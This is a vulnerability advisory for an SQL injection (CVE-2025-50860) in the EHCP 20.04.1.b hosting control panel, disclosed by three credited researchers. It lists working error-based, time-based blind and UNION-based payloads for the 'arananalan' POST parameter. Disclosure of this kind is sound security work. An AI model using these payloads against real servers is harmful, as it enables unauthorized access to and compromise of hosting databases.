Title: Easy Hosting Control Panel (EHCP) 20.04.1.b - SQL Injection in the
listdomains function via the arananalan POST parameter

Description: SQL Injection vulnerability exists in the listdomains function
of Easy Hosting Control Panel (EHCP) 20.04.1.b, where insufficient
validation of the arananalan POST parameter in the /index.php?op=listdomains
endpoint allows an authenticated attacker to inject malicious SQL queries.
By leveraging error-based, time-based blind, and UNION-based techniques,
the attacker can extract or manipulate backend database content,
potentially leading to unauthorized access and full compromise of the
database.

Source Name/Email: Korn Chaisuwan (korn.c.sec@gmail.com), Charanin
Thongudom (charanin.t.sec@gmail.com), Pongtorn Angsuchotmetee
(monkeydouy@gmail.com)


CVEs: CVE-2025-50860

Software URL: https://www.ehcp.net/


Parameter: arananalan (POST)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: aranan=test&arananalan=(UPDATEXML(8509,CONCAT(0x2e,0x7162717071,(SELECT (ELT(8509=8509,1))),0x7178627871),5369))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: aranan=test&arananalan=(SELECT 2663 FROM (SELECT(SLEEP(5)))NNwr)

    Type: UNION query
    Title: MySQL UNION query (23) - 8 columns
    Payload: aranan=test&arananalan=-9147 UNION ALL SELECT
23,23,CONCAT(0x7162717071,0x696d4f4961444246667a4a5843676b74557165416a6253447a6343725472506f4749456d68547075,0x7178627871),23,23,23,23,23#